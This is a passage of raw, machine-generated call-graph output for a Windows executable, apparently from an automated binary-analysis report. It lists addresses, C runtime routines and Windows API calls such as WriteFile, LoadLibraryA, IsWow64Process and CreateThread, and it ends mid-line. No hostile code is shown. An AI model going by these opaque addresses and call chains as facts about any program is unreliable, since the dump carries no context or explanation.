104837->104843 104838->104774 104839->104837 104844 a38b28 __recalloc 58 API calls 104840->104844 104842 a40e5b __read_nolock 70 API calls 104841->104842 104846 a40dfd 104842->104846 104843->104838 104845 a40e09 104844->104845 104847 a38af4 __wsopen_nolock 58 API calls 104845->104847 104848 a40e33 __read LeaveCriticalSection 104846->104848 104847->104846 104848->104838 104849->104766 104850->104764 104851->104769 104855 a3520a GetSystemTimeAsFileTime 104852->104855 104854 a78f6e 104854->104444 104856 a35238 __aulldiv 104855->104856 104856->104854 104858 a35c6c __initptd 104857->104858 104859 a35c93 104858->104859 104860 a35c7e 104858->104860 104862 a36c11 __lock_file 59 API calls 104859->104862 104871 a38b28 58 API calls __getptd_noexit 104860->104871 104864 a35c99 104862->104864 104863 a35c83 104872 a38db6 9 API calls __wctomb_s_l 104863->104872 104873 a358d0 67 API calls 7 library calls 104864->104873 104867 a35ca4 104874 a35cc4 LeaveCriticalSection LeaveCriticalSection _fseek 104867->104874 104869 a35cb6 104870 a35c8e __initptd 104869->104870 104870->104448 104871->104863 104872->104870 104873->104867 104874->104869 104875->104314 104876->104327 104877->104329 104878->104326 104879->104335 104881 a19169 Mailbox 104880->104881 104882 a4f19f 104881->104882 104886 a19173 104881->104886 104883 a30db6 Mailbox 59 API calls 104882->104883 104885 a4f1ab 104883->104885 104884 a1917a 104884->104341 104886->104884 104888 a19c90 59 API calls Mailbox 104886->104888 104888->104886 104889->104350 104890->104345 104896 a79748 __tzset_nolock _wcscmp 104891->104896 104892 a795dc 104892->104356 104892->104384 104893 a14f0b 74 API calls 104893->104896 104894 a79109 GetSystemTimeAsFileTime 104894->104896 104895 a14ee5 85 API calls 104895->104896 104896->104892 104896->104893 104896->104894 104896->104895 104898 a78b11 104897->104898 104899 a78b1f 104897->104899 104900 a3525b 115 API calls 104898->104900 104901 a78b64 104899->104901 104902 a3525b 115 API calls 104899->104902 104927 a78b28 104899->104927 104900->104899 104928 a78d91 104901->104928 104904 a78b49 104902->104904 104904->104901 104906 a78b52 104904->104906 104905 a78ba8 104907 a78bcd 104905->104907 104908 a78bac 104905->104908 104910 a353a6 __fcloseall 83 API calls 104906->104910 104906->104927 104932 a789a9 104907->104932 104909 a78bb9 104908->104909 104912 a353a6 __fcloseall 83 API calls 104908->104912 104914 a353a6 __fcloseall 83 API calls 104909->104914 104909->104927 104910->104927 104912->104909 104914->104927 104915 a78bfb 104941 a78c2b 104915->104941 104916 a78bdb 104917 a78be8 104916->104917 104919 a353a6 __fcloseall 83 API calls 104916->104919 104921 a353a6 __fcloseall 83 API calls 104917->104921 104917->104927 104919->104917 104921->104927 104924 a78c16 104926 a353a6 __fcloseall 83 API calls 104924->104926 104924->104927 104926->104927 104927->104385 104929 a78db6 104928->104929 104930 a78d9f __tzset_nolock _memmove 104928->104930 104931 a355e2 __fread_nolock 74 API calls 104929->104931 104930->104905 104931->104930 104933 a3571c __crtGetStringTypeA_stat 58 API calls 104932->104933 104934 a789b8 104933->104934 104935 a3571c __crtGetStringTypeA_stat 58 API calls 104934->104935 104936 a789cc 104935->104936 104937 a3571c __crtGetStringTypeA_stat 58 API calls 104936->104937 104938 a789e0 104937->104938 104939 a78d0d 58 API calls 104938->104939 104940 a789f3 104938->104940 104939->104940 104940->104915 104940->104916 104945 a78c40 104941->104945 104942 a78cf8 104974 a78f35 104942->104974 104943 a78a05 74 API calls 104943->104945 104945->104942 104945->104943 104948 a78c02 104945->104948 104970 a78e12 104945->104970 104978 a78aa1 74 API calls 104945->104978 104949 a78d0d 104948->104949 104950 a78d20 104949->104950 104951 a78d1a 104949->104951 104953 a78d31 104950->104953 104954 a32d55 _free 58 API calls 104950->104954 104952 a32d55 _free 58 API calls 104951->104952 104952->104950 104955 a78c09 104953->104955 104956 a32d55 _free 58 API calls 104953->104956 104954->104953 104955->104924 104957 a353a6 104955->104957 104956->104955 104958 a353b2 __initptd 104957->104958 104959 a353c6 104958->104959 104960 a353de 104958->104960 105027 a38b28 58 API calls __getptd_noexit 104959->105027 104962 a36c11 __lock_file 59 API calls 104960->104962 104967 a353d6 __initptd 104960->104967 104964 a353f0 104962->104964 104963 a353cb 105028 a38db6 9 API calls __wctomb_s_l 104963->105028 105011 a3533a 104964->105011 104967->104924 104971 a78e21 104970->104971 104973 a78e61 104970->104973 104971->104945 104971->104971 104973->104971 104979 a78ee8 104973->104979 104975 a78f42 104974->104975 104976 a78f53 104974->104976 104977 a34863 80 API calls 104975->104977 104976->104948 104977->104976 104978->104945 104980 a78f14 104979->104980 104982 a78f25 104979->104982 104983 a34863 104980->104983 104982->104973 104984 a3486f __initptd 104983->104984 104985 a3489d __initptd 104984->104985 104986 a348a5 104984->104986 104987 a3488d 104984->104987 104985->104982 104988 a36c11 __lock_file 59 API calls 104986->104988 105008 a38b28 58 API calls __getptd_noexit 104987->105008 104990 a348ab 104988->104990 104996 a3470a 104990->104996 104991 a34892 105009 a38db6 9 API calls __wctomb_s_l 104991->105009 104998 a34719 104996->104998 105005 a34737 104996->105005 104997 a34727 104999 a38b28 __recalloc 58 API calls 104997->104999 104998->104997 105000 a34751 _memmove 104998->105000 104998->105005 105001 a3472c 104999->105001 105003 a3ae1e __flsbuf 78 API calls 105000->105003 105004 a34a3d __flush 78 API calls 105000->105004 105000->105005 105006 a346e6 __stbuf 58 API calls 105000->105006 105007 a3d886 __write 78 API calls 105000->105007 105002 a38db6 __wctomb_s_l 9 API calls 105001->105002 105002->105005 105003->105000 105004->105000 105010 a348dd LeaveCriticalSection LeaveCriticalSection _fseek 105005->105010 105006->105000 105007->105000 105008->104991 105009->104985 105010->104985 105012 a35349 105011->105012 105013 a3535d 105011->105013 105066 a38b28 58 API calls __getptd_noexit 105012->105066 105015 a35359 105013->105015 105030 a34a3d 105013->105030 105029 a35415 LeaveCriticalSection LeaveCriticalSection _fseek 105015->105029 105016 a3534e 105067 a38db6 9 API calls __wctomb_s_l 105016->105067 105022 a346e6 __stbuf 58 API calls 105023 a35377 105022->105023 105040 a40a02 105023->105040 105025 a3537d 105025->105015 105026 a32d55 _free 58 API calls 105025->105026 105026->105015 105027->104963 105028->104967 105029->104967 105031 a34a74 105030->105031 105032 a34a50 105030->105032 105036 a40b77 105031->105036 105032->105031 105033 a346e6 __stbuf 58 API calls 105032->105033 105034 a34a6d 105033->105034 105068 a3d886 105034->105068 105037 a40b84 105036->105037 105039 a35371 105036->105039 105038 a32d55 _free 58 API calls 105037->105038 105037->105039 105038->105039 105039->105022 105041 a40a0e __initptd 105040->105041 105042 a40a32 105041->105042 105043 a40a1b 105041->105043 105044 a40abd 105042->105044 105046 a40a42 105042->105046 105193 a38af4 58 API calls __getptd_noexit 105043->105193 105198 a38af4 58 API calls __getptd_noexit 105044->105198 105050 a40a60 105046->105050 105051 a40a6a 105046->105051 105048 a40a20 105194 a38b28 58 API calls __getptd_noexit 105048->105194 105195 a38af4 58 API calls __getptd_noexit 105050->105195 105054 a3d206 ___lock_fhandle 59 API calls 105051->105054 105052 a40a65 105199 a38b28 58 API calls __getptd_noexit 105052->105199 105056 a40a70 105054->105056 105058 a40a83 105056->105058 105059 a40a8e 105056->105059 105057 a40ac9 105200 a38db6 9 API calls __wctomb_s_l 105057->105200 105178 a40add 105058->105178 105196 a38b28 58 API calls __getptd_noexit 105059->105196 105062 a40a27 __initptd 105062->105025 105064 a40a89 105197 a40ab5 LeaveCriticalSection __unlock_fhandle 105064->105197 105066->105016 105067->105015 105069 a3d892 __initptd 105068->105069 105070 a3d8b6 105069->105070 105071 a3d89f 105069->105071 105073 a3d955 105070->105073 105075 a3d8ca 105070->105075 105169 a38af4 58 API calls __getptd_noexit 105071->105169 105175 a38af4 58 API calls __getptd_noexit 105073->105175 105074 a3d8a4 105170 a38b28 58 API calls __getptd_noexit 105074->105170 105078 a3d8f2 105075->105078 105079 a3d8e8 105075->105079 105096 a3d206 105078->105096 105171 a38af4 58 API calls __getptd_noexit 105079->105171 105082 a3d8ed 105176 a38b28 58 API calls __getptd_noexit 105082->105176 105083 a3d8f8 105085 a3d90b 105083->105085 105086 a3d91e 105083->105086 105105 a3d975 105085->105105 105172 a38b28 58 API calls __getptd_noexit 105086->105172 105087 a3d961 105177 a38db6 9 API calls __wctomb_s_l 105087->105177 105091 a3d917 105174 a3d94d LeaveCriticalSection __unlock_fhandle 105091->105174 105092 a3d923 105173 a38af4 58 API calls __getptd_noexit 105092->105173 105093 a3d8ab __initptd 105093->105031 105097 a3d212 __initptd 105096->105097 105098 a3d261 EnterCriticalSection 105097->105098 105100 a39c0b __lock 58 API calls 105097->105100 105099 a3d287 __initptd 105098->105099 105099->105083 105101 a3d237 105100->105101 105102 a3d24f 105101->105102 105104 a39e2b __mtinitlocknum InitializeCriticalSectionAndSpinCount 105101->105104 105103 a3d28b ___lock_fhandle LeaveCriticalSection 105102->105103 105103->105098 105104->105102 105106 a3d982 __write_nolock 105105->105106 105107 a3d9c1 105106->105107 105108 a3d9e0 105106->105108 105138 a3d9b6 105106->105138 105110 a38af4 __wsopen_nolock 58 API calls 105107->105110 105111 a3da38 105108->105111 105112 a3da1c 105108->105112 105109 a3c5f6 __except1 6 API calls 105113 a3e1d6 105109->105113 105114 a3d9c6 105110->105114 105116 a3da51 105111->105116 105120 a418c1 __lseeki64_nolock 60 API calls 105111->105120 105115 a38af4 __wsopen_nolock 58 API calls 105112->105115 105113->105091 105117 a38b28 __recalloc 58 API calls 105114->105117 105119 a3da21 105115->105119 105118 a45c6b __stbuf 58 API calls 105116->105118 105121 a3d9cd 105117->105121 105123 a3da5f 105118->105123 105124 a38b28 __recalloc 58 API calls 105119->105124 105120->105116 105122 a38db6 __wctomb_s_l 9 API calls 105121->105122 105122->105138 105125 a3ddb8 105123->105125 105130 a399ac __beginthread 58 API calls 105123->105130 105126 a3da28 105124->105126 105127 a3ddd6 105125->105127 105128 a3e14b WriteFile 105125->105128 105129 a38db6 __wctomb_s_l 9 API calls 105126->105129 105131 a3defa 105127->105131 105140 a3ddec 105127->105140 105132 a3ddab GetLastError 105128->105132 105137 a3dd78 105128->105137 105129->105138 105133 a3da8b GetConsoleMode 105130->105133 105144 a3dfef 105131->105144 105146 a3df05 105131->105146 105132->105137 105133->105125 105135 a3daca 105133->105135 105134 a3e184 105136 a38b28 __recalloc 58 API calls 105134->105136 105134->105138 105135->105125 105139 a3dada GetConsoleCP 105135->105139 105142 a3e1b2 105136->105142 105137->105134 105137->105138 105143 a3ded8 105137->105143 105138->105109 105139->105134 105166 a3db09 105139->105166 105140->105134 105141 a3de5b WriteFile 105140->105141 105141->105132 105145 a3de98 105141->105145 105149 a38af4 __wsopen_nolock 58 API calls 105142->105149 105150 a3dee3 105143->105150 105151 a3e17b 105143->105151 105144->105134 105152 a3e064 WideCharToMultiByte 105144->105152 105145->105140 105147 a3debc 105145->105147 105146->105134 105148 a3df6a WriteFile 105146->105148 105147->105137 105148->105132 105153 a3dfb9 105148->105153 105149->105138 105154 a38b28 __recalloc 58 API calls 105150->105154 105155 a38b07 __dosmaperr 58 API calls 105151->105155 105152->105132 105161 a3e0ab 105152->105161 105153->105137 105153->105146 105153->105147 105157 a3dee8 105154->105157 105155->105138 105156 a3e0b3 WriteFile 105159 a3e106 GetLastError 105156->105159 105156->105161 105160 a38af4 __wsopen_nolock 58 API calls 105157->105160 105158 a335f5 __write_nolock 58 API calls 105158->105166 105159->105161 105160->105138 105161->105137 105161->105144 105161->105147 105161->105156 105162 a47a5e WriteConsoleW CreateFileW __putwch_nolock 105167 a3dc5f 105162->105167 105163 a462ba 60 API calls __write_nolock 105163->105166 105164 a3dbf2 WideCharToMultiByte 105164->105137 105165 a3dc2d WriteFile 105164->105165 105165->105132 105165->105167 105166->105137 105166->105158 105166->105163 105166->105164 105166->105167 105167->105132 105167->105137 105167->105162 105167->105166 105168 a3dc87 WriteFile 105167->105168 105168->105132 105168->105167 105169->105074 105170->105093 105171->105082 105172->105092 105173->105091 105174->105093 105175->105082 105176->105087 105177->105093 105201 a3d4c3 105178->105201 105180 a40b41 105214 a3d43d 59 API calls 2 library calls 105180->105214 105181 a40aeb 105181->105180 105183 a3d4c3 __chsize_nolock 58 API calls 105181->105183 105192 a40b1f 105181->105192 105185 a40b16 105183->105185 105184 a3d4c3 __chsize_nolock 58 API calls 105186 a40b2b CloseHandle 105184->105186 105189 a3d4c3 __chsize_nolock 58 API calls 105185->105189 105186->105180 105190 a40b37 GetLastError 105186->105190 105187 a40b49 105188 a40b6b 105187->105188 105215 a38b07 58 API calls 3 library calls 105187->105215 105188->105064 105189->105192 105190->105180 105192->105180 105192->105184 105193->105048 105194->105062 105195->105052 105196->105064 105197->105062 105198->105052 105199->105057 105200->105062 105202 a3d4ce 105201->105202 105204 a3d4e3 105201->105204 105203 a38af4 __wsopen_nolock 58 API calls 105202->105203 105206 a3d4d3 105203->105206 105205 a38af4 __wsopen_nolock 58 API calls 105204->105205 105207 a3d508 105204->105207 105208 a3d512 105205->105208 105209 a38b28 __recalloc 58 API calls 105206->105209 105207->105181 105210 a38b28 __recalloc 58 API calls 105208->105210 105211 a3d4db 105209->105211 105212 a3d51a 105210->105212 105211->105181 105213 a38db6 __wctomb_s_l 9 API calls 105212->105213 105213->105211 105214->105187 105215->105188 105278 a41940 105216->105278 105219 a14799 105284 a17d8c 105219->105284 105220 a1477c 105221 a17bcc 59 API calls 105220->105221 105223 a14788 105221->105223 105280 a17726 105223->105280 105226 a30791 105227 a41940 __write_nolock 105226->105227 105228 a3079e GetLongPathNameW 105227->105228 105229 a17bcc 59 API calls 105228->105229 105230 a172bd 105229->105230 105231 a1700b 105230->105231 105232 a17667 59 API calls 105231->105232 105233 a1701d 105232->105233 105234 a14750 60 API calls 105233->105234 105235 a17028 105234->105235 105236 a17033 105235->105236 105240 a4e885 105235->105240 105237 a13f74 59 API calls 105236->105237 105239 a1703f 105237->105239 105288 a134c2 105239->105288 105242 a4e89f 105240->105242 105294 a17908 61 API calls 105240->105294 105243 a17052 Mailbox 105243->104152 105245 a14ddd 136 API calls 105244->105245 105246 a1688f 105245->105246 105247 a4e031 105246->105247 105248 a14ddd 136 API calls 105246->105248 105249 a7955b 122 API calls 105247->105249 105250 a168a3 105248->105250 105251 a4e046 105249->105251 105250->105247 105252 a168ab 105250->105252 105253 a4e067 105251->105253 105254 a4e04a 105251->105254 105256 a4e052 105252->105256 105257 a168b7 105252->105257 105255 a30db6 Mailbox 59 API calls 105253->105255 105258 a14e4a 84 API calls 105254->105258 105277 a4e0ac Mailbox 105255->105277 105402 a742f8 90 API calls _wprintf 105256->105402 105295 a16a8c 105257->105295 105258->105256 105261 a4e060 105261->105253 105263 a4e260 105264 a32d55 _free 58 API calls 105263->105264 105265 a4e268 105264->105265 105266 a14e4a 84 API calls 105265->105266 105271 a4e271 105266->105271 105270 a32d55 _free 58 API calls 105270->105271 105271->105270 105273 a14e4a 84 API calls 105271->105273 105406 a6f7a1 89 API calls 4 library calls 105271->105406 105273->105271 105274 a17de1 59 API calls 105274->105277 105277->105263 105277->105271 105277->105274 105388 a1750f 105277->105388 105396 a1735d 105277->105396 105403 a6f73d 59 API calls 2 library calls 105277->105403 105404 a6f65e 61 API calls 2 library calls 105277->105404 105405 a7737f 59 API calls Mailbox 105277->105405 105279 a1475d GetFullPathNameW 105278->105279 105279->105219 105279->105220 105281 a17734 105280->105281 105282 a17d2c 59 API calls 105281->105282 105283 a14794 105282->105283 105283->105226 105285 a17da6 105284->105285 105287 a17d99 105284->105287 105286 a30db6 Mailbox 59 API calls 105285->105286 105286->105287 105287->105223 105289 a134f3 _memmove 105288->105289 105290 a134d4 105288->105290 105291 a30db6 Mailbox 59 API calls 105289->105291 105292 a30db6 Mailbox 59 API calls 105290->105292 105293 a1350a 105291->105293 105292->105289 105293->105243 105294->105240 105296 a16ab5 105295->105296 105297 a4e41e 105295->105297 105412 a157a6 60 API calls Mailbox 105296->105412 105498 a6f7a1 89 API calls 4 library calls 105297->105498 105300 a16ad7 105413 a157f6 105300->105413 105301 a4e431 105499 a6f7a1 89 API calls 4 library calls 105301->105499 105304 a16af4 105307 a17667 59 API calls 105304->105307 105306 a4e44d 105309 a16b61 105306->105309 105308 a16b00 105307->105308 105426 a30957 60 API calls __write_nolock 105308->105426 105311 a4e460 105309->105311 105312 a16b6f 105309->105312 105314 a15c6f CloseHandle 105311->105314 105315 a17667 59 API calls 105312->105315 105313 a16b0c 105316 a17667 59 API calls 105313->105316 105317 a4e46c 105314->105317 105318 a16b78 105315->105318 105319 a16b18 105316->105319 105321 a14ddd 136 API calls 105317->105321 105322 a17667 59 API calls 105318->105322 105320 a14750 60 API calls 105319->105320 105323 a16b26 105320->105323 105324 a4e488 105321->105324 105325 a16b81 105322->105325 105427 a15850 ReadFile SetFilePointerEx 105323->105427 105327 a4e4b1 105324->105327 105330 a7955b 122 API calls 105324->105330 105436 a1459b 105325->105436 105500 a6f7a1 89 API calls 4 library calls 105327->105500 105329 a16b52 105428 a15aee 105329->105428 105334 a4e4a4 105330->105334 105337 a4e4ac 105334->105337 105338 a4e4cd 105334->105338 105336 a4e4c8 105366 a16d0c Mailbox 105336->105366 105341 a14e4a 84 API calls 105337->105341 105340 a14e4a 84 API calls 105338->105340 105342 a4e4d2 105340->105342 105341->105327 105343 a30db6 Mailbox 59 API calls 105342->105343 105350 a4e506 105343->105350 105347 a13bbb 105347->104017 105347->104042 105351 a1750f 59 API calls 105350->105351 105370 a4e54f Mailbox 105351->105370 105355 a4e740 105505 a772df 59 API calls Mailbox 105355->105505 105359 a4e762 105506 a8fbce 59 API calls 2 library calls 105359->105506 105362 a4e76f 105364 a32d55 _free 58 API calls 105362->105364 105364->105366 105407 a157d4 105366->105407 105368 a1750f 59 API calls 105368->105370 105370->105355 105370->105368 105379 a17de1 59 API calls 105370->105379 105383 a4e792 105370->105383 105501 a6f73d 59 API calls 2 library calls 105370->105501 105502 a6f65e 61 API calls 2 library calls 105370->105502 105503 a7737f 59 API calls Mailbox 105370->105503 105504 a17213 59 API calls Mailbox 105370->105504 105379->105370 105507 a6f7a1 89 API calls 4 library calls 105383->105507 105385 a4e7ab 105386 a32d55 _free 58 API calls 105385->105386 105387 a4e7be 105386->105387 105387->105366 105389 a175af 105388->105389 105393 a17522 _memmove 105388->105393 105391 a30db6 Mailbox 59 API calls 105389->105391 105390 a30db6 Mailbox 59 API calls 105392 a17529 105390->105392 105391->105393 105394 a30db6 Mailbox 59 API calls 105392->105394 105395 a17552 105392->105395 105393->105390 105394->105395 105395->105277 105397 a17370 105396->105397 105399 a1741e 105396->105399 105398 a30db6 Mailbox 59 API calls 105397->105398 105401 a173a2 105397->105401 105398->105401 105399->105277 105400 a30db6 59 API calls Mailbox 105400->105401 105401->105399 105401->105400 105402->105261 105403->105277 105404->105277 105405->105277 105406->105271 105408 a15c6f CloseHandle 105407->105408 105409 a157dc Mailbox 105408->105409 105410 a15c6f CloseHandle 105409->105410 105411 a157eb 105410->105411 105411->105347 105412->105300 105414 a15c6f CloseHandle 105413->105414 105415 a15802 105414->105415 105510 a15c99 105415->105510 105417 a15821 105418 a15844 105417->105418 105518 a15610 105417->105518 105418->105301 105418->105304 105420 a15833 105535 a1527b SetFilePointerEx SetFilePointerEx 105420->105535 105422 a4dc07 105536 a7345a SetFilePointerEx SetFilePointerEx WriteFile 105422->105536 105423 a1583a 105423->105418 105423->105422 105425 a4dc37 105425->105418 105426->105313 105427->105329 105429 a15b08 105428->105429 105430 a15b8f SetFilePointerEx 105429->105430 105431 a4dd28 105429->105431 105435 a15b63 105429->105435 105549 a15c4e SetFilePointerEx 105430->105549 105550 a15c4e SetFilePointerEx 105431->105550 105434 a4dd42 105435->105309 105437 a17667 59 API calls 105436->105437 105438 a145b1 105437->105438 105439 a17667 59 API calls 105438->105439 105440 a145b9 105439->105440 105441 a17667 59 API calls 105440->105441 105442 a145c1 105441->105442 105443 a17667 59 API calls 105442->105443 105444 a145c9 105443->105444 105445 a4d4d2 105444->105445 105446 a145fd 105444->105446 105447 a18047 59 API calls 105445->105447 105448 a1784b 59 API calls 105446->105448 105449 a4d4db 105447->105449 105450 a1460b 105448->105450 105451 a17d8c 59 API calls 105449->105451 105452 a17d2c 59 API calls 105450->105452 105454 a14640 105451->105454 105453 a14615 105452->105453 105453->105454 105455 a1784b 59 API calls 105453->105455 105457 a1465f 105454->105457 105458 a4d4fb 105454->105458 105472 a14680 105454->105472 105459 a14636 105455->105459 105462 a179f2 59 API calls 105457->105462 105460 a4d5cb 105458->105460 105474 a4d5b4 105458->105474 105481 a4d532 105458->105481 105461 a17d2c 59 API calls 105459->105461 105464 a17bcc 59 API calls 105460->105464 105461->105454 105465 a14669 105462->105465 105482 a4d588 105464->105482 105471 a1784b 59 API calls 105465->105471 105465->105472 105471->105472 105551 a1784b 105472->105551 105474->105460 105477 a4d59f 105474->105477 105476 a179f2 59 API calls 105476->105482 105480 a17bcc 59 API calls 105477->105480 105478 a4d590 105479 a17bcc 59 API calls 105478->105479 105479->105482 105480->105482 105481->105478 105485 a4d57b 105481->105485 105482->105472 105482->105476 105564 a17924 59 API calls 2 library calls 105482->105564 105486 a17bcc 59 API calls 105485->105486 105486->105482 105498->105301 105499->105306 105500->105336 105501->105370 105502->105370 105503->105370 105504->105370 105505->105359 105506->105362 105507->105385 105511 a15cb2 CreateFileW 105510->105511 105512 a4dd58 105510->105512 105513 a15cd4 105511->105513 105512->105513 105514 a4dd5e CreateFileW 105512->105514 105513->105417 105514->105513 105515 a4dd84 105514->105515 105516 a15aee 2 API calls 105515->105516 105517 a4dd8f 105516->105517 105517->105513 105519 a4dba5 105518->105519 105520 a1562b 105518->105520 105534 a156ba 105519->105534 105543 a15cdf 105519->105543 105521 a15aee 2 API calls 105520->105521 105520->105534 105522 a1564d 105521->105522 105523 a1522e 59 API calls 105522->105523 105525 a15657 105523->105525 105525->105519 105526 a15664 105525->105526 105527 a30db6 Mailbox 59 API calls 105526->105527 105528 a1566f 105527->105528 105529 a1522e 59 API calls 105528->105529 105530 a1567a 105529->105530 105537 a15bc0 105530->105537 105533 a15aee 2 API calls 105533->105534 105534->105420 105535->105423 105536->105425 105538 a15c33 105537->105538 105542 a15bce 105537->105542 105548 a15c4e SetFilePointerEx 105538->105548 105539 a156a7 105539->105533 105541 a15c06 ReadFile 105541->105539 105541->105542 105542->105539 105542->105541 105544 a15aee 2 API calls 105543->105544 105545 a15d00 105544->105545 105546 a15aee 2 API calls 105545->105546 105547 a15d14 105546->105547 105547->105534 105548->105542 105549->105435 105550->105434 105552 a178b7 105551->105552 105553 a1785a 105551->105553 105555 a17d2c 59 API calls 105552->105555 105553->105552 105554 a17865 105553->105554 105556 a17880 105554->105556 105557 a4eb09 105554->105557 105560 a17888 _memmove 105555->105560 105565 a17f27 59 API calls Mailbox 105556->105565 105559 a18029 59 API calls 105557->105559 105564->105482 105565->105560 105567 a16d95 105566->105567 105568 a16ea9 105566->105568 105567->105568 105569 a30db6 Mailbox 59 API calls 105567->105569 105568->104158 105571 a16dbc 105569->105571 105570 a30db6 Mailbox 59 API calls 105571->105570 106104 a11016 106109 a14974 106104->106109 106107 a32d40 __cinit 67 API calls 106108 a11025 106107->106108 106110 a30db6 Mailbox 59 API calls 106109->106110 106111 a1497c 106110->106111 106112 a1101b 106111->106112 106116 a14936 106111->106116 106112->106107 106117 a1493f 106116->106117 106119 a14951 106116->106119 106118 a32d40 __cinit 67 API calls 106117->106118 106118->106119 106120 a149a0 106119->106120 106121 a17667 59 API calls 106120->106121 106122 a149b8 GetVersionExW 106121->106122 106123 a17bcc 59 API calls 106122->106123 106124 a149fb 106123->106124 106125 a17d2c 59 API calls 106124->106125 106130 a14a28 106124->106130 106126 a14a1c 106125->106126 106127 a17726 59 API calls 106126->106127 106127->106130 106128 a14a93 GetCurrentProcess IsWow64Process 106129 a14aac 106128->106129 106132 a14ac2 106129->106132 106133 a14b2b GetSystemInfo 106129->106133 106130->106128 106131 a4d864 106130->106131 106144 a14b37 106132->106144 106134 a14af8 106133->106134 106134->106112 106137 a14ad4 106140 a14b37 2 API calls 106137->106140 106138 a14b1f GetSystemInfo 106139 a14ae9 106138->106139 106139->106134 106142 a14aef FreeLibrary 106139->106142 106141 a14adc GetNativeSystemInfo 106140->106141 106141->106139 106142->106134 106145 a14ad0 106144->106145 106146 a14b40 LoadLibraryA 106144->106146 106145->106137 106145->106138 106146->106145 106147 a14b51 GetProcAddress 106146->106147 106147->106145 106148 a11066 106153 a1f76f 106148->106153 106150 a1106c 106151 a32d40 __cinit 67 API calls 106150->106151 106152 a11076 106151->106152 106154 a1f790 106153->106154 106186 a2ff03 106154->106186 106158 a1f7d7 106159 a17667 59 API calls 106158->106159 106160 a1f7e1 106159->106160 106161 a17667 59 API calls 106160->106161 106162 a1f7eb 106161->106162 106163 a17667 59 API calls 106162->106163 106164 a1f7f5 106163->106164 106165 a17667 59 API calls 106164->106165 106166 a1f833 106165->106166 106167 a17667 59 API calls 106166->106167 106168 a1f8fe 106167->106168 106196 a25f87 106168->106196 106172 a1f930 106173 a17667 59 API calls 106172->106173 106174 a1f93a 106173->106174 106224 a2fd9e 106174->106224 106176 a1f981 106177 a1f991 GetStdHandle 106176->106177 106178 a1f9dd 106177->106178 106179 a545ab 106177->106179 106180 a1f9e5 OleInitialize 106178->106180 106179->106178 106181 a545b4 106179->106181 106180->106150 106231 a76b38 64 API calls Mailbox 106181->106231 106183 a545bb 106232 a77207 CreateThread 106183->106232 106185 a545c7 CloseHandle 106185->106180 106233 a2ffdc 106186->106233 106189 a2ffdc 59 API calls 106190 a2ff45 106189->106190 106191 a17667 59 API calls 106190->106191 106192 a2ff51 106191->106192 106193 a17bcc 59 API calls 106192->106193 106194 a1f796 106193->106194 106195 a30162 6 API calls 106194->106195 106195->106158 106197 a17667 59 API calls 106196->106197 106198 a25f97 106197->106198 106199 a17667 59 API calls 106198->106199 106200 a25f9f 106199->106200 106240 a25a9d 106200->106240 106203 a25a9d 59 API calls 106204 a25faf 106203->106204 106205 a17667 59 API calls 106204->106205 106206 a25fba 106205->106206 106207 a30db6 Mailbox 59 API calls 106206->106207 106208 a1f908 106207->106208 106209 a260f9 106208->106209 106210 a26107 106209->106210 106211 a17667 59 API calls 106210->106211 106212 a26112 106211->106212 106213 a17667 59 API calls 106212->106213 106214 a2611d 106213->106214 106215 a17667 59 API calls 106214->106215 106216 a26128 106215->106216 106217 a17667 59 API calls 106216->106217 106218 a26133 106217->106218 106219 a25a9d 59 API calls 106218->106219 106220 a2613e 106219->106220 106221 a30db6 Mailbox 59 API calls 106220->106221 106222 a26145 RegisterWindowMessageW 106221->106222 106222->106172 106225 a6576f 106224->106225 106226 a2fdae 106224->106226 106243 a79ae7 60 API calls 106225->106243 106227 a30db6 Mailbox 59 API calls 106226->106227 106230 a2fdb6 106227->106230 106229 a6577a 106230->106176 106231->106183 106232->106185 106244 a771ed 65 API calls 106232->106244 106234 a17667 59 API calls 106233->106234 106235 a2ffe7 106234->106235 106236 a17667 59 API calls 106235->106236 106237 a2ffef 106236->106237 106238 a17667 59 API calls 106237->106238 106239 a2ff3b 106238->106239 106239->106189 106241 a17667 59 API calls 106240->106241 106242 a25aa5 106241->106242 106242->106203 106243->106229 106245 a4fdfc 106279 a1ab30 Mailbox _memmove 106245->106279 106247 a6617e Mailbox 59 API calls 106267 a1a057 106247->106267 106249 a30db6 59 API calls Mailbox 106249->106279 106251 a1b525 106492 a79e4a 89 API calls 4 library calls 106251->106492 106253 a50055 106491 a79e4a 89 API calls 4 library calls 106253->106491 106256 a30db6 59 API calls Mailbox 106273 a19f37 Mailbox 106256->106273 106258 a1b475 106263 a18047 59 API calls 106258->106263 106259 a50064 106260 a1b47a 106260->106253 106274 a509e5 106260->106274 106263->106267 106265 a18047 59 API calls 106265->106273 106266 a17667 59 API calls 106266->106273 106268 a66e8f 59 API calls 106268->106273 106269 a17de1 59 API calls 106269->106279 106270 a32d40 67 API calls __cinit 106270->106273 106271 a509d6 106496 a79e4a 89 API calls 4 library calls 106271->106496 106273->106253 106273->106256 106273->106258 106273->106260 106273->106265 106273->106266 106273->106267 106273->106268 106273->106270 106273->106271 106275 a1a55a 106273->106275 106484 a1c8c0 341 API calls 2 library calls 106273->106484 106485 a1b900 60 API calls Mailbox 106273->106485 106497 a79e4a 89 API calls 4 library calls 106274->106497 106495 a79e4a 89 API calls 4 library calls 106275->106495 106276 a8bc6b 341 API calls 106276->106279 106278 a1b2b6 106489 a1f6a3 341 API calls 106278->106489 106279->106249 106279->106251 106279->106267 106279->106269 106279->106273 106279->106276 106279->106278 106280 a19ea0 341 API calls 106279->106280 106282 a5086a 106279->106282 106284 a50878 106279->106284 106286 a5085c 106279->106286 106287 a1b21c 106279->106287 106291 a66e8f 59 API calls 106279->106291 106297 a7d07a 106279->106297 106344 a8445a 106279->106344 106353 a21fc3 106279->106353 106393 a7d07b 106279->106393 106440 a8df23 106279->106440 106443 a8c2e0 106279->106443 106475 a77956 106279->106475 106481 a6617e 106279->106481 106486 a19c90 59 API calls Mailbox 106279->106486 106490 a8c193 85 API calls 2 library calls 106279->106490 106280->106279 106493 a19c90 59 API calls Mailbox 106282->106493 106494 a79e4a 89 API calls 4 library calls 106284->106494 106286->106247 106286->106267 106487 a19d3c 60 API calls Mailbox 106287->106487 106289 a1b22d 106488 a19d3c 60 API calls Mailbox 106289->106488 106291->106279 106298 a7d0a5 106297->106298 106299 a7d09a 106297->106299 106302 a17667 59 API calls 106298->106302 106342 a7d17f Mailbox 106298->106342 106498 a19b3c 59 API calls 106299->106498 106301 a30db6 Mailbox 59 API calls 106303 a7d1c8 106301->106303 106305 a7d0c9 106302->106305 106304 a7d1d4 106303->106304 106501 a157a6 60 API calls Mailbox 106303->106501 106308 a19837 84 API 